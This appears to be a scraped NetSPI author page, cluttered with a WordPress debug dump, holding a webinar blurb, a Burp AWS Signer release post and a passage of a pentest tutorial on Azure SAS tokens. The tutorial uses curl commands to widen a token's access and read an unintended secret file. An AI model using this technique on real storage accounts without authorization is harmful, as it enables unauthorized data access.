Jake Karnes

Jake has a B.S. in Computer Science from San Jose State University, and holds the GIAC Certified Incident Handler and Certified Ethical Hacker certifications. He specializes in web application penetration testing. Jake also contributes to the development of applications and tools for the NetSPI penetration testing team.
More by Jake Karnes
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "52"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "52"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "52"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "52"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "52"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "52"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "52"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "52"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{910d9485f96e7687f320f04bdc20abd1bb259f390e118d9a9578ae077c5952d8}\"52\"{910d9485f96e7687f320f04bdc20abd1bb259f390e118d9a9578ae077c5952d8}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{910d9485f96e7687f320f04bdc20abd1bb259f390e118d9a9578ae077c5952d8}\"52\"{910d9485f96e7687f320f04bdc20abd1bb259f390e118d9a9578ae077c5952d8}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 28369
                    [post_author] => 53
                    [post_date] => 2022-09-11 13:58:36
                    [post_date_gmt] => 2022-09-11 18:58:36
                    [post_content] => 




Watch Now

NetSPI Managing Consultant Jake Karnes spoke at the CrestCon UK 2022 conference at the Royal College of Physicians. During this session, Jake described how he found and responsibly disclosed a serious Microsoft vulnerability: The Kerberos Bronze Bit Attack.

Watch the recording below to:

  • Gain a high-level understanding of Kerberos and the Bronze Bit Attack
  • Get a behind-the-scenes look at the responsible vulnerability disclosure process
  • Learn from and apply Jake’s lessons learned from a critical vulnerability finding to your security testing practices

[wonderplugin_video iframe="https://youtu.be/aGiFRttHah4" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Persistence is Vital: Key Lessons Learned when Finding and Discovering CVE-2020-17049 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => key-lessons-learned-cve-2020-17049 [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:55:20 [post_modified_gmt] => 2023-08-22 14:55:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28369 [menu_order] => 39 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 27558 [post_author] => 52 [post_date] => 2022-03-31 10:00:00 [post_date_gmt] => 2022-03-31 15:00:00 [post_content] =>

Update April 20, 2022: The updated version of the AWS Signer extension is now available on the BApp Store. This can be installed/updated within Burp Suite through the Extender tab. Alternatively the extension can be downloaded from the BApp Store here and installed manually.

+ + +

The AWS Signer extension enhances Burp Suite’s functionality for manipulating API requests sent to AWS services. As the requests pass through the proxy, the extension signs (or resigns) the requests using user-supplied credentials and the AWS SigV4 algorithm. This allows the user to easily modify/replay the request in Burp Suite and ensure the AWS service accepts the request. Eligible requests are automatically identified by the presence of the X-Amz-Date and Authorization header. 

The extension was initially released by NetSPI’s Eric Gruber in October 2017 and has been maintained by NetSPI’s Andrey Rainchik. The extension has served as a valuable tool on hundreds of penetration tests over the years. 

Today, I’m releasing version 2.0 which brings functional and usability improvements to the extension. An introduction to the enhancements is provided below. For more detailed information on how to use the extension, please see the updated documentation on GitHub.

The New Burp Suite Extension Interface

The most obvious difference upon loading the new version is that the extension’s UI tab in Burp Suite looks very different. All the key functionality from the original version of the extension remains.

This is the AWS Signer extension UI tab in Burp Suite.

At the top of the tab, we have “Global Settings,” which controls extension-wide behavior. The user can enable/disable the extension entirely through a checkbox. Additionally, a user can also select a profile to use for signing all requests in the “Always Sign With” dropdown menu. If set, all eligible requests will be signed with the selected profile’s credentials. Speaking of profiles…

Introducing Profile Management

A profile represents a collection of settings for signing requests. As with the previous version of AWS Signer, a profile can specify which region and service should be used when signing the request. Or that information can be extracted from the request itself via the Authorization header. The new version of the extension introduces import and export functionality for profiles. 

You Can Now Import Profiles from Multiple Sources

Upon clicking the Import button, a pop-up window will appear to guide the user through the import process. 

You can import profiles within Burp Suite using Auto, File, Env, and Clipboard.

Profiles can be imported from a variety of sources using the buttons at the top of the pop-up window:

  • Auto: Automatically sources profiles from default credential files (as used by the AWS CLI), the clipboard, and the following environment variables:
    • AWS_ACCESS_KEY_ID
    • AWS_SECRET_ACCESS_KEY
    • AWS_SESSION_TOKEN
  • File: Allows the user to specify which file to load profiles from. This is useful for importing previously exported profiles.
  • Env: Attempts to import a profile based on the standardized AWS CLI environment variables listed above.
  • Clipboard: Attempts to automatically recognize and import a profile based on credentials currently copied and held in the user's clipboard. 

After sourcing the profiles, the user can select which ones to bring into the extension using the checkboxes beside each profile. 

Once the profiles are imported and configured by the user, all of the profiles can be easily exported to a file via the Export button. If working with a teammate, the exported profiles could be shared between multiple testers to reduce configuration time. This also allows for easily storing and restoring the extension’s configuration without including sensitive credentials within the project’s Burp Suite configuration. 

New: Profile Types

A key improvement in the latest version of the extension is the introduction of multiple profile types. Each profile type uses a different method for sourcing its credentials which will be used for signing requests. There are currently three profile types, each of which is described below. 

Static Credentials Profile

This is the profile type that previous users of the extension will be most familiar with. The user simply provides an access key, a secret key and (optionally) a session token. When this profile is used to sign a request, these credentials are used to generate the signature.

AssumeRole Profile

The AssumeRole profile type allows the user to sign requests with the credentials that were returned after assuming an IAM role. The user must provide at least the following:

  1. The role ARN of the IAM role to assume.
  2. A profile that provides credentials to assume the role. This is referred to as the “Assumer Profile.”

When signing a request with an AssumeRole profile, the extension will first call the AssumeRole API using the Assumer profile to obtain an access key, secret key, and session token for the role. Using a profile (rather than static credentials) allows the extension to handle complex chaining of multiple profiles to fetch the necessary credentials. 

After retrieving the credentials, the extension will cache and reuse them to avoid continuously invoking the AssumeRole API. This is configurable through the Duration setting. The user may also provide a session policy to be applied when assuming the role. A session policy is an IAM policy, which can be used to further restrict the IAM permissions granted to a temporary session for a role. Session policies are useful for testing and confirming intended behavior with a specific policy because they are applied immediately upon the AssumeRole call with zero propagation delay and can be quickly modified. This eliminates the frustrating delays waiting for the eventual consistency of IAM permissions.

New AssumeRole profile in the AWS Signer.

Command Profile

The final profile type allows the user to provide an OS command or external program to provide the signing credentials. The command will be executed using either cmd (Windows) or sh (non-Windows). The extension will attempt to parse the credentials from the command's stdout output. The output does not have a set format, and the credential extraction is based on pattern matching. The extension is designed to recognize valid credentials in a variety of output formats. Similar to the AssumeRole profile, the returned credentials will be cached and reused where possible. The user can configure the lifetime of the credentials through the Duration field. For ease of testing, the UI also displays the latest credentials returned after clicking the “Test Profile Credentials” button.

The Command Profile type allows the user to provide an OS command or external program to provide the signing credentials.

Signing Improvements

The AWS Signer extension should properly sign well-formatted requests to any AWS service using SigV4. In older versions of the extension, some S3 API requests were not handled properly and would be rejected by the S3 service. The actual signing process is delegated to the AWS Java SDK, which should provide robust signing support for a wide variety of services and inputs. 

The extension also provides experimental support for SigV4a. At the time of writing, there is minimal published information about the SigV4a signing process. However, this functionality is available in the AWS Java SDK. As such, the AWS Signer extension attempts to recognize SigV4a requests and perform the proper signing process via the SDK. 

This is functional for the currently available multi-region access points in S3, which require SigV4a. However, as more information becomes available and as more services adopt this signing process, the extension may not handle all use cases.

Summary of Changes in Burp Suite Extension: AWS Signer 2.0

I sincerely hope you enjoy the changes in version 2.0 of the AWS Signer extension for Burp Suite. NetSPI will coordinate with PortSwigger to ensure this update is made available in the BApp store as soon as possible. In the meantime, the update is available from the Releases page of the project’s GitHub repositories. Please submit all bug reports and feature requests as issues in GitHub and we’ll address those as we’re able to. 

Want to pentest some of the most prominent and innovative organizations in the world? NetSPI is hiring! Visit our careers page to explore open security consultant roles.

[post_title] => Burp Suite Extension: AWS Signer 2.0 Release [post_excerpt] => This post covers the latest updates and features available in the AWS Signer Burp Suite Extension. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => burp-suite-extension-aws-signer-2 [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:19:58 [post_modified_gmt] => 2023-03-16 14:19:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27558 [menu_order] => 282 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 27056 [post_author] => 52 [post_date] => 2022-01-06 13:10:52 [post_date_gmt] => 2022-01-06 19:10:52 [post_content] =>

Let’s say you’re performing a web application penetration test and you see that the site links to a URL that looks like the following:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

Following that link, you can see that the content of testsastokenblob.txt is served to you. But do you realize that you’ve also been given access to list, read, and write all the blobs in the container? Do you realize that you’ve also been given access to File service in the storage account? This blog will teach you what the above URL really is, how to understand each component, and how to identify opportunities for deeper access into an application’s cloud storage. 

TL;DR

For readers who recognize the above URL and are already familiar with the concept of Azure SAS tokens, feel free to jump to the examples section below. There are breakdowns and manipulations for the following scenarios:

  1. A user SAS with read and list permissions.
  2. An account SAS with read and list permissions for both the Blob and File services.
  3. A read-only account SAS and multiple storage containers.

If these are new concepts or you’d like a refresher on the details, continue below to learn more.

What is that URL anyway?

That URL is a shared access signature (SAS) which provides direct access to content stored in an Azure storage account. To understand its purpose, first consider a traditional web application with file uploads/downloads. This functionality needs to be built into the application itself, and all the content passes through the application on its way to the file system.

Shared access signatures provide an alternative for applications using Azure storage accounts. Rather than handling uploads/downloads within the application, the application authorizes the client to store, retrieve and manage content within the cloud storage directly. The SAS identifies the resource(s) to be accessed and includes the client’s proof of authorization.

Traditional versus Direct Cloud Storage

Breaking down the Shared Access Signature

When we come across a shared access signature on a pentest, we need to understand what access we’ve been granted. Almost all the information we need is provided in the SAS itself. But to best understand it, we’ll need to break it down and inspect each part. 

That long SAS is composed of two main parts:

  1. The Storage Resource URL:
    https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/ testsastokendirectory/testsastokenblob.txt
  2. The SAS Token:
    sp=rw&st=2021-11-09T01:10:20Z&se=2021-11-09T09:10:20Z&spr=https&sv=2020-08-04&sr=b&sig=pafv%2FpEiqfIJ7Fvyia22awgqPgPx%2ByBpm1zGX%2FgOSDg%3D

We’ll take a closer look at both of those halves. Let’s start with the storage resource URL.

The Storage Resource URL

The storage resource URL identifies the content within the storage account that will be accessed. This content may be a blob, directory, container, file, queue, or table. To identify which resource we’re given access to, we can break down this URL into two parts: the domain name and the URL path.  

The Domain Name

The domain name in the storage resource URL has the following format:
<storage_account_name>.<service_id>.windows.net

Let’s look our example from earlier:
testsastokenaccount.blob.core.windows.net

We can identify that the storage account name is testsastokenaccount. While the SAS won’t provide access across storage accounts, the name itself can provide a starting place for guessing other valid storage accounts. For example, if our SAS pointed to companystorage1 or companystorage-prod, we may successfully guess that companystorage2 or companystorage-dev storage accounts exist. And if we’re truly lucky, those storage accounts may allow public access.

The domain name also identifies the storage service that the SAS provides access to. The <service_id> placeholder can have one of the following values:

  1. blobAzure Blob Storage
  2. fileAzure File Storage
  3. queueAzure Queue Storage
  4. tableAzure Table Storage

One SAS token may provide access to multiple storage services within a storage account. This means that if our SAS authorizes us to perform List operations against a container in Blob storage, we should check if we can also perform List operations against directories in File storage. 

The URL Path

The URL path within the storage resource URL identifies a specific resource to be accessed. The same SAS token may provide access to multiple individual resources. For example, if the URL path within an SAS is /profile_pics/user1_profile.jpeg and we observe that our SAS token gives us Read access, then we could attempt to directly access other content by changing the URL path to /profile_pics/user2_profile.jpeg. If the SAS token doesn’t provide List access, then wordlists and context from the application itself will be the most helpful in finding other readable content.

The SAS Token

The SAS token is the second half of the shared access signature and authorizes the request to access the resources specified in the storage resource URL. The token is a series of URL parameters and values which define the constraints of that access. While there are many possible parameters that could be included, we’ll look at the most common and impactful here. 

Signed Permissions (sp)

The permissions granted by the SAS token are defined by the value of the sp parameter. Common values include: 

  • Create (c): Create a new resource.
  • Read (r): Read the resource.
  • Add (a): Add/append to an existing resource.
  • Write (w): Create or write a resource’s content and metadata.
  • Delete (d): Delete a resource.
  • List (l): List objects within a resource.
  • (And much more depending on the SAS type and storage service)

Values can also be combined to allow multiple actions. For example, sp=rl would allow for listing all objects within a resource (such as a container) and the reading the contents of each of those objects. Even sp=rw could be abused by an attacker uploading a large file, and then downloading it many times. This could easily rack up a large Azure bill through egress costs alone.  

This value should be inspected carefully as the SAS token’s permissions may provide much more than the functionality within the application itself. 

Signed Services (ss)

The ss parameter is only included if token belongs to an “account” SAS. An account SAS may provide access to one or more storage services. The value of the ss parameter defines which services a specific SAS token is authorized for. The allowed values are: 

  • Blob (b)
  • Queue (q)
  • Table (t)
  • File (f)

Values can also be combined to provide access to multiple services. For example, ss=bf allows access to the Blob and File services. If multiple values are specified for the ss parameter, be sure to try attempt access to the different service endpoints using the domain names provided above.

Signed Resource Types (srt)

The SAS token is scoped to specific types of resources. If the SAS token belongs to an account SAS, the allowed resource types are defined by the value of the srt parameter. Allowed values include:

  • Service (s): Access to service-level APIs (e.g., Get/Set Service Properties, Get Service Stats, List Containers/Queues/Tables/Shares)
  • Container (c): Access to container-level APIs (e.g., Create/Delete Container, Create/Delete Queue, Create/Delete Table, Create/Delete Share, List Blobs/Files and Directories)
  • Object (o): Access to object-level APIs for blobs, queue messages, table entities, and files (e.g. Put Blob, Query Entity, Get Messages, Create File, etc.)

Like before, these values can be combined. For example, srt=co would provide permissions to both individual objects (e.g. blobs and files) and their logical parents (e.g. containers and directories).

Signed Resources (sr)

If the SAS token does not belong to an account SAS, then it belongs to a user SAS or service SAS. For our purposes, there are a couple important differences between these two SAS types and the account SAS type:

  1. A user SAS or service SAS can only provide access to a single service. A user SAS is limited to only the Blob service. A service SAS is limited to only one of the four storage services: Blob, File, Queue or Table.
  2. The permissions of a user SAS or service SAS may be more restricted than the SAS token suggests. The permissions of a user SAS are limited by the permissions of the user who signed the SAS. The permissions of a service SAS may be restricted by a stored access policy.

Because a user/service SAS is limited to a single service, the ss parameter will not be present in the SAS token. Additionally, the user/service token uses the sr parameter to define allowed resources, rather than the srt parameter. Some of the allowed values for the sr parameter are:

  • Blob (b): Grants access to the content and metadata of the blob.
  • Container (c): Grants access to the content and metadata of any blob in the container, and to the list of blobs in the container.
  • Directory (d): Grants access to the content and metadata of any blob in the directory, and to the list of blobs in the directory.
  • File (f): Grants access to the content and metadata of the file within the File service.
  • Share (s): This grants access to the content and metadata of any file in the share, and to the list of directories and files in the share, within the File service.

Signed Expiry (se)

The value of the se parameter defines when the SAS becomes invalid. Applications are allowed to set this very far into the future, even hundreds of years! While it may be convenient to avoid dealing with frequently generating new SAS tokens, there are a couple problems you may run into:

  1. The SAS may provide a malicious user long-term access into the storage account, even if that user is removed or banned from the application itself.
    1. This is especially dangerous if the application changes how it uses the storage account. For example, consider a web application that stores users’ public pictures in a storage account. Because these are all public pictures, the application hands out long-lived SAS tokens to all users allowing them to read all the blobs directly from cloud storage. Later, the web application rolls out a feature allowing users to store private pictures as well. If the application stores the private pictures in the same storage account, then the previously issued SAS tokens may allow users to access the private pictures as well. 
  2. SAS tokens can be difficult to revoke. Depending on the SAS type, revocation may require the storage account keys to be rotated. This would impact any existing use of those keys (such as other applications and other SAS tokens). 

Signed IP (sip)

The value of the sip parameter defines an IP address or range of addresses which are allowed to access the resources. The request to interact with the stored content must be received from one of these addresses, otherwise Azure will deny the request. If the same SAS works on one machine but not another, this could be the culprit. 

Signature (sig)

The above list of parameters is not exhaustive and not all the parameters will be present for all SAS tokens. However, every SAS token is required to have the sig parameter. This is a Base64-encoded SHA256 HMAC and provides integrity that the SAS token is unaltered. Any changes we make to the SAS token will be detected through this signature, and our requests will be rejected. But keep in mind, we’re free to edit and manipulate the storage resource URL, so long as the SAS token remains unchanged. 

Examples

Now that we understand the various components of a shared access signature, let’s take a look at a few examples. With each example, we’ll break down the SAS and see how we could abuse the access it grants us.

Example 1 – User SAS

Let’s say we encounter the following SAS during a pentest. What could we do with it?

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

If we follow that link, we’re returned some simple content: 

curl
"https://testsastokenaccount.blob.core.windows.net/testsastokencont
ainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11
-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-98
42-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=20
21-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04
&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%
2BRe5DsC%2FzPE5M%3D"
Hello World
curl "https://testsastokenaccount.blob.core.windows.net/testsastokencont ainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11 -29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-98 42-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=20 21-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04 &spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC% 2BRe5DsC%2FzPE5M%3D" Hello World

Having access to that content is fine (and likely required for the functionality of the web app we’re testing), but let’s see if this SAS gives us any more access. Let’s start by identifying our key components and seeing what information that gives us:

  • Resource URL
    • Domain Name: testsastokenaccount.blob.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
      • We can identify the container name: testsastokencontainer
      • We can identify a directory within the container: testsastokendirectory
      • We can identity the blob we’re accessing: testsastokenblob.txt
  • SAS Token:
    • Signed Permissions (sp): rwl
      • We’re authorized for read, write and list actions
    • Signed Resources (sr): c
      • We’re authorized to access the content and metadata of any blob in the container, and to the list of blobs in the container.
      • This is a user or service SAS, not an account SAS, because this parameter is present instead of the srt parameter.
    • Signed Expiry (se): 2021-12-07T08:00:00Z
      • The token is valid until this time. 
    • Signed Object Id (skoid): c7352c6b-06c4-40ce-9842-9dff0f004dbe
      • This is a required parameter for a user SAS, confirming the type of SAS. 
    • The additional values are required for the SAS token but are not very useful to us.

From this breakdown, we have a couple key takeaways:

  1. We have read, write and list permissions over the blobs within the testsastokencontainer container. 
  2. We have a user SAS which is limited to Blob storage and may be limited by the permissions of the principal which created the SAS. 

Let’s use our list permissions to find other blobs within the container. To do this, we need to make 2 edits to our original SAS:

  1. We need to change the path in the resource URL to only reference the container, not a specific blob.
    1. Original: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
    2. New: /testsastokencontainer
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the container: restype=container&comp=list

With both changes, our new SAS becomes:

https://testsastokenaccount.blob.core.windows.net/testsastokencont
ainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z
&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004d
be&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00
:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=
2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2Fz
PE5M%3D
https://testsastokenaccount.blob.core.windows.net/testsastokencont ainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z &se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004d be&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00 :00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv= 2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2Fz PE5M%3D

Let’s make a request to this URL (and nicely format the XML output):

curl -s "https://testsastokenaccount.blob.core.windows.net/testsas
tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08
:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff
0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29
T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https
&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%
2FzPE5M%3D" | xmllint --format –
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.
blob.core.windows.net/" ContainerName="testsastokencontainer">
<Blobs>
<Blob>
<Name>testsastokendirectory/my_secret_file.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
<Blob>
<Name>testsastokendirectory/testsastokenblob.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>
curl -s "https://testsastokenaccount.blob.core.windows.net/testsas tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08 :00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff 0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29 T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https &sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC% 2FzPE5M%3D" | xmllint --format – <?xml version="1.0" encoding="utf-8"?> <EnumerationResults ServiceEndpoint="https://testsastokenaccount. blob.core.windows.net/" ContainerName="testsastokencontainer"> <Blobs> <Blob> <Name>testsastokendirectory/my_secret_file.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> <Blob> <Name>testsastokendirectory/testsastokenblob.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> </Blobs> <NextMarker/> </EnumerationResults>

In addition to the testsastokenblob.txt blob we already know about, the response also lists a my_secret_file.txt blob in the same directory. Because we have read access to all blobs in the container, we can update our SAS to reference this blob and read its contents:

curl "https://testsastokenaccount.blob.core.windows.net/testsastok
encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202
1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce
-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=
2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https&
sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F
zPE5M%3D"
Username: user123
Password: password123
curl "https://testsastokenaccount.blob.core.windows.net/testsastok encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202 1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce -9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt= 2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https& sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F zPE5M%3D" Username: user123 Password: password123

And just like that, we’ve taken our original SAS and abused our privileges to access content we aren’t intended to have. 

Example 2 – Account SAS

Let’s consider another SAS:

https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D

Again, we could follow the link to download the content:

curl "https://testsastokenaccount.file.core.windows.net/testfilesh
are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b
f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp
r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D"
Hello Again
curl "https://testsastokenaccount.file.core.windows.net/testfilesh are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D" Hello Again

Let’s perform the same breakdown as before to see what information the SAS itself provides:

  • Resource URL
    • Domain Name: testsastokenaccount.file.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for File storage: file.core.windows.net
    • URL Path: /testfileshare/testfilesharedirectory/testsastokenfile.txt
      • We can identify the share name: testfileshare
      • We can identify a directory within the share: testfilesharedirectory
      • We can identity the file we’re accessing: testsastokenfile.txt
  • SAS Token:
    • Signed Permissions (sp): rl
      • We’re authorized for read and list actions.
    • Signed Services (ss): bf
      • We’re authorized for the Blob and File services.
